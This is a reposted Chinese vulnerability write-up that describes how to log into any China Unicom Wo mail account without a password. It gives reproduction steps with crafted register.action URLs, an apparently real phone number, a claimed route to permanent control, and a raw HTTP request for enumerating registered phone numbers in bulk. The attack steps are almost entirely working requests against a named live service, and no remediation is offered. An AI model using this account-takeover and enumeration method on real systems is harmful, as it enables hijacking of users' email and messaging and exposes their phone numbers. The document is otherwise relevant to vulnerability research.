复现流程:
1.首先手机号注册过邮箱
2.然后访问如下链接,找个注册过邮箱的手机号
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=185********
3.填写别名,只能设置一次,但是一般都不会设置,哈哈
4.确认后就跳转进去了
5.因为没有密码,是通过这个接口生成cookie跳转进来的
下面是达到永久控制的步骤
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=18600111138
继续改别名会提示,已经有别名了,无所谓,访问下面链接,其实是已经登录的
http://mail.wo.cn/welcome.action
漏洞证明:
6.可批量跑注册过邮箱的手机号了
爆破接口
POST /mail/register.action HTTP/1.1
Host: mail.wo.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://mail.wo.cn/mail/register.action
Content-Length: 50
Cookie:
Connection: close
Pragma: no-cache
Cache-Control: no-cache
actionType=CheckUser&user=18600141111&domain=wo.cn
返回208是注册过邮箱的
转载自原文链接, 如需删除请联系管理员。
原文链接:中国联通沃任意邮箱账户登录(免密码永久控制沃通行证可发私信短信) ---管管侠,转载请注明来源!